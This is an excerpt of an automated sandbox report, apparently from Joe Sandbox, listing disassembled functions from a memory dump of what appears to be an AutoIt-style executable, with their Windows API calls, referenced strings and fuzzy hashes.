Instruction ID: 531d42144c7eca47c84ea8dc7aa5d812d7ba617d0d86db5b857142e2fcdbd1de
Opcode Fuzzy Hash: 2a7905587b4728297735e6c70dfa90e01145dcdbd541fc57796d4dc130b2d18e
Instruction Fuzzy Hash: 29310470974205A6DB15EE90CC43EEDB3A8AF21391F200126FA41B10D1EFB56E78CD8A

Function 0025CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0025CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0025CBBC
SetWindowTextW.USER32(?,?), ref: 0025CBD3
GetDlgItem.USER32(?,000003EA), ref: 0025CBE8
SetWindowTextW.USER32(00000000,?), ref: 0025CBEE
GetDlgItem.USER32(?,000003E9), ref: 0025CBFE
SetWindowTextW.USER32(00000000,?), ref: 0025CC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0025CC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0025CC3F
GetWindowRect.USER32(?,?), ref: 0025CC48
SetWindowTextW.USER32(?,?), ref: 0025CCB3
GetDesktopWindow.USER32 ref: 0025CCB9
GetWindowRect.USER32(00000000), ref: 0025CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0025CD0C
GetClientRect.USER32(?,?), ref: 0025CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0025CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0025CD69

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 9a622ac3bc877064b065affe25af963c1c230fd27d5fb1d5060578bac9584b97
Instruction ID: b1fbdf6c9ea93e584a504c5bf49317b47bd94457ed1a6737d8695ed25c8d3580
Opcode Fuzzy Hash: 9a622ac3bc877064b065affe25af963c1c230fd27d5fb1d5060578bac9584b97
Instruction Fuzzy Hash: 07517F7190070AAFDB20DFA8DE89B6EBBF5FF04706F100519E946A25A0D774A928CF54

Function 0028A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0028A87E
DestroyWindow.USER32(?,?), ref: 0028A8F8

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0028A972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0028A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0028A9A7
DestroyWindow.USER32(00000000), ref: 0028A9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00200000,00000000), ref: 0028AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0028AA19
GetDesktopWindow.USER32 ref: 0028AA32
GetWindowRect.USER32(00000000), ref: 0028AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0028AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0028AA69

Part of subcall function 002029AB: GetWindowLongW.USER32(?,000000EB), ref: 002029BC

Strings

tooltips_class32, xrefs: 0028A96B, 0028A9F9
0, xrefs: 0028A894

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 189b8eb7289b7b27fbd31e950318a26bb756109d9e717335e50001a4e7016597
Instruction ID: 8c49284b1cddbb1c3d6821d815538c2bdce4990ce173d0bd772bef3f4ed81fc6
Opcode Fuzzy Hash: 189b8eb7289b7b27fbd31e950318a26bb756109d9e717335e50001a4e7016597
Instruction Fuzzy Hash: 9071A975164205AFE725DF28DC88FAA77F9EB88300F04061EF985872A1DB74A921DF52

Function 0028CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 002029E2: GetWindowLongW.USER32(?,000000EB), ref: 002029F3

DragQueryPoint.SHELL32(?,?), ref: 0028CCCF

Part of subcall function 0028B1A9: ClientToScreen.USER32(?,?), ref: 0028B1D2
Part of subcall function 0028B1A9: GetWindowRect.USER32(?,?), ref: 0028B248
Part of subcall function 0028B1A9: PtInRect.USER32(?,?,0028C6BC), ref: 0028B258

SendMessageW.USER32(?,000000B0,?,?), ref: 0028CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0028CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0028CD66
_wcscat.LIBCMT ref: 0028CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0028CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 0028CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 0028CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 0028CDFF
DragFinish.SHELL32(?), ref: 0028CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0028CEF9

Strings

@GUI_DROPID, xrefs: 0028CE26
@GUI_DRAGID, xrefs: 0028CE71
@GUI_DRAGFILE, xrefs: 0028CEA8

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 348210f44a68f1d7d658f828da907a29eb47516c65c8ec6aa23a38cb20186080
Instruction ID: 8084e9fc6e99d1dfc12c36cb153e276c27ce0b5e65dfc4d904c3286815d15e00
Opcode Fuzzy Hash: 348210f44a68f1d7d658f828da907a29eb47516c65c8ec6aa23a38cb20186080
Instruction Fuzzy Hash: 59619C71118305AFC701EF50DC89D9FBBE8EF89750F100A2EF695921A1DB709A69CF62

Function 002682D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0026831A
VariantCopy.OLEAUT32(00000000,?), ref: 00268323
VariantClear.OLEAUT32(00000000), ref: 0026832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0026841D
__swprintf.LIBCMT ref: 0026844D
VarR8FromDec.OLEAUT32(?,?), ref: 00268479
VariantInit.OLEAUT32(?), ref: 0026852A
SysFreeString.OLEAUT32(?), ref: 002685BE
VariantClear.OLEAUT32(?), ref: 00268618
VariantClear.OLEAUT32(?), ref: 00268627
VariantInit.OLEAUT32(00000000), ref: 00268665

Strings

Default, xrefs: 002684DA
%4d%02d%02d%02d%02d%02d, xrefs: 00268447

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 174dc6156304adf2e96211f0dde0cc69aecd5a407a26df5f1a3e750220fca411
Instruction ID: c031f0d52284aebce1538074484124df0255767cf3a8e1225653970430e9b081
Opcode Fuzzy Hash: 174dc6156304adf2e96211f0dde0cc69aecd5a407a26df5f1a3e750220fca411
Instruction Fuzzy Hash: 91D10671634616EBDB209FA1D894B6EB7B4FF05B00F148295E505AB281DF70ECB0DB91

Function 002849CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00284A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00284AAC

Strings

UNCHECK, xrefs: 00284C88
CHECK, xrefs: 00284ACC
GETITEMCOUNT, xrefs: 00284B8E
SELECT, xrefs: 00284C5D
COLLAPSE, xrefs: 00284AF2
EXPAND, xrefs: 00284B5E
GETTEXT, xrefs: 00284BFF
EXISTS, xrefs: 00284B15
ISCHECKED, xrefs: 00284C2F
GETSELECTED, xrefs: 00284BBC
GETTOTALCOUNT, xrefs: 00284A93

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 28f404ac568d03b4035d2251deac3262d7397c3e52cd8fa281413f325be3e626
Instruction ID: bd2bc9d83ded5189b0cc6d6944e398516aa46f5dd6ad6a117bfed50f5e71a5cd
Opcode Fuzzy Hash: 28f404ac568d03b4035d2251deac3262d7397c3e52cd8fa281413f325be3e626
Instruction Fuzzy Hash: 2F919B742217129FCB04FF20C491A6AB7A5AF94354F108959F8965B3E3CB30ED69CF81

Function 0028BE70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0028BF26
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002897E7), ref: 0028BF82
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0028BFBB
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0028BFFE
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0028C035
FreeLibrary.KERNEL32(?), ref: 0028C041
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0028C051
DestroyIcon.USER32(?,?,?,?,?,002897E7), ref: 0028C060
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0028C07D
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0028C089

Part of subcall function 0022312D: __wcsicmp_l.LIBCMT ref: 002231B6

Strings

.dll, xrefs: 0028BEDF
.exe, xrefs: 0028BEBC
.icl, xrefs: 0028BE9C

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 3cd336e5854ccb3f06b4d710198cd9b1c4091921da51c2da5ccbfb74c5739cd1
Instruction ID: 1c35d474d15e69ce9296754a351d1af1ca13b4537b3227b40fd3d3bf89f68018
Opcode Fuzzy Hash: 3cd336e5854ccb3f06b4d710198cd9b1c4091921da51c2da5ccbfb74c5739cd1
Instruction Fuzzy Hash: 5861E471920219FEEB14EF64DC85BBE77A8FB08750F10420AF915D61C1DBB4A960DFA0

Function 0026E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0026E31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 0026E32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0026E33B
__wsplitpath.LIBCMT ref: 0026E399
_wcscat.LIBCMT ref: 0026E3B1
_wcscat.LIBCMT ref: 0026E3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0026E3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 0026E3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 0026E41E
SetCurrentDirectoryW.KERNEL32(?), ref: 0026E43F
_wcscpy.LIBCMT ref: 0026E44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0026E48A

Strings

*.*, xrefs: 0026E445

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 203260a99e88a352d7746eac0e0c8b6a9aa37845c535c2e246df6997d6be68d0
Instruction ID: 880cc7484e24bf1bfe0d9d96fa3d1f3f01458bf972a3b08f0a8f9aca95f97783
Opcode Fuzzy Hash: 203260a99e88a352d7746eac0e0c8b6a9aa37845c535c2e246df6997d6be68d0
Instruction Fuzzy Hash: D8617AB6524305AFCB10EF60D88499FB3E9BF88310F04891EF98987251DB31E965CF92

Function 002023F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00201F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00202412,?,00000000,?,?,?,?,00201AA7,00000000,?), ref: 00201F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002024AF
KillTimer.USER32(-00000001,?,?,?,?,00201AA7,00000000,?,?,00201EBE,?,?), ref: 0020254A
DestroyAcceleratorTable.USER32(00000000), ref: 0023BFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00201AA7,00000000,?,?,00201EBE,?,?), ref: 0023C018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00201AA7,00000000,?,?,00201EBE,?,?), ref: 0023C02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00201AA7,00000000,?,?,00201EBE,?,?), ref: 0023C04B
DeleteObject.GDI32(00000000), ref: 0023C05D

Strings

h), xrefs: 0020256F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: h)
API String ID: 641708696-720724143
Opcode ID: 08dc8c4b69639abedc0a67ec4c9dcffe7fd1175b40a3907f6c70807ed1c638c4
Instruction ID: 94b01fd02467b642e461b67614f73b521c621f6c5ca4735ad362a5162764bd18
Opcode Fuzzy Hash: 08dc8c4b69639abedc0a67ec4c9dcffe7fd1175b40a3907f6c70807ed1c638c4
Instruction Fuzzy Hash: 5961CF31134746DFDB299F14ED8CB2AB7B1FB40312F10861AE542669A1C371A8B8EF90

Function 0026A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0026A2C2

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0026A2E3
__swprintf.LIBCMT ref: 0026A33C
__swprintf.LIBCMT ref: 0026A355
_wprintf.LIBCMT ref: 0026A3FC
_wprintf.LIBCMT ref: 0026A41A

Strings

Error: , xrefs: 0026A3C4
^ ERROR , xrefs: 0026A391
Line %d (File "%s"):, xrefs: 0026A336, 0026A34F
"%s" (%d) : ==> %s:, xrefs: 0026A415
Incorrect parameters to object property !, xrefs: 0026A39E
"%s" (%d) : ==> %s:%s%s, xrefs: 0026A3F7

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 9c5925a038b511b9d176a3386b1f908d2caac1711bdc917f333f34c4f2829d4e
Instruction ID: 583a8b967cb3e3477ddee46088d325a19ac1d32a51b922c7a51ad20a0eb43ee7
Opcode Fuzzy Hash: 9c5925a038b511b9d176a3386b1f908d2caac1711bdc917f333f34c4f2829d4e
Instruction Fuzzy Hash: 8151A071920119AACF25EBE0DD46EEEB7B9AF14380F100165F505B2092EB752FB8DF52

Function 00260065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0024F8B8,00000001,0000138C,00000001,00000000,00000001,?,00273FF9,00000000), ref: 0026009A
LoadStringW.USER32(00000000,?,0024F8B8,00000001), ref: 002600A3

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

GetModuleHandleW.KERNEL32(00000000,002C7310,?,00000FFF,?,?,0024F8B8,00000001,0000138C,00000001,00000000,00000001,?,00273FF9,00000000,00000001), ref: 002600C5
LoadStringW.USER32(00000000,?,0024F8B8,00000001), ref: 002600C8
__swprintf.LIBCMT ref: 00260118
__swprintf.LIBCMT ref: 00260129
_wprintf.LIBCMT ref: 002601D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 002601E9

Strings

Error: , xrefs: 002601A0
^ ERROR, xrefs: 0026017E
Line %d (File "%s"):, xrefs: 00260112
%s (%d) : ==> %s: %s %s, xrefs: 002601CD
Line %d:, xrefs: 00260123

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: ba4f97f8c258145dc48aa95beeb4468c597b61f21a45e5e3573ea3e17c91fcdf
Instruction ID: 045d3f4c3c56febee5fa531072d8e81d4c23f91e57024393e607dc7f1c679d4c
Opcode Fuzzy Hash: ba4f97f8c258145dc48aa95beeb4468c597b61f21a45e5e3573ea3e17c91fcdf
Instruction Fuzzy Hash: 5B414F72820119AACF14EBD0DD96DEFB7BDAF25340F100165F605A2092DB356FB9CEA1

Function 0026A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00204D37: __itow.LIBCMT ref: 00204D62
Part of subcall function 00204D37: __swprintf.LIBCMT ref: 00204DAC

CharLowerBuffW.USER32(?,?), ref: 0026AA0E
GetDriveTypeW.KERNEL32 ref: 0026AA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0026AAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0026AADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0026AB08

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

Strings

open , xrefs: 0026AA6A
wait, xrefs: 0026AAC5
close cd wait, xrefs: 0026AAF3
close, xrefs: 0026AA14
set cd door , xrefs: 0026AAA9
type cdaudio alias cd wait, xrefs: 0026AA86
closed, xrefs: 0026AA22, 0026AA2B
open, xrefs: 0026AA35

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 2e0a75f473bee04c6c606b32830590e78175681189ce6ad1d8622891a76e3ee0
Instruction ID: 60925ca428781ac7e3f91f9a55d99d76015bd3bbad1fda4070cfc842d8f7e613
Opcode Fuzzy Hash: 2e0a75f473bee04c6c606b32830590e78175681189ce6ad1d8622891a76e3ee0
Instruction Fuzzy Hash: E3517E711243059FC700EF10C8819AAB7F8FF98758F10892DF895972A2DB71AE65CF92

Function 0026A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0026A852
__swprintf.LIBCMT ref: 0026A874
CreateDirectoryW.KERNEL32(?,00000000), ref: 0026A8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0026A8D6
_memset.LIBCMT ref: 0026A8F5
_wcsncpy.LIBCMT ref: 0026A931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0026A966
CloseHandle.KERNEL32(00000000), ref: 0026A971
RemoveDirectoryW.KERNEL32(?), ref: 0026A97A
CloseHandle.KERNEL32(00000000), ref: 0026A984

Strings

:, xrefs: 0026A895
\, xrefs: 0026A88A
\??\%s, xrefs: 0026A86E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 141355c299de8ecf92dbc3bbd30b6a7d61b50cc31d4b146fc7a58a37bbd6f8b6
Instruction ID: 06a1ed65d7c3a5c0a5d02d72918165fa38eafce463f1a375eeff85340dd6c243
Opcode Fuzzy Hash: 141355c299de8ecf92dbc3bbd30b6a7d61b50cc31d4b146fc7a58a37bbd6f8b6
Instruction Fuzzy Hash: 6831A37191011AABDB21DFA0EC89FEF73BCEF89700F1041A6F909E2160E77096948F25

Function 0028C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0028982C,?,?), ref: 0028C0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0028982C,?,?,00000000,?), ref: 0028C0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0028982C,?,?,00000000,?), ref: 0028C0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,0028982C,?,?,00000000,?), ref: 0028C0F7
GlobalLock.KERNEL32(00000000,?,?,?,?,0028982C,?,?,00000000,?), ref: 0028C100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0028982C,?,?,00000000,?), ref: 0028C10F
GlobalUnlock.KERNEL32(00000000,?,?,?,?,0028982C,?,?,00000000,?), ref: 0028C118
CloseHandle.KERNEL32(00000000,?,?,?,?,0028982C,?,?,00000000,?), ref: 0028C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0028982C,?,?,00000000,?), ref: 0028C130
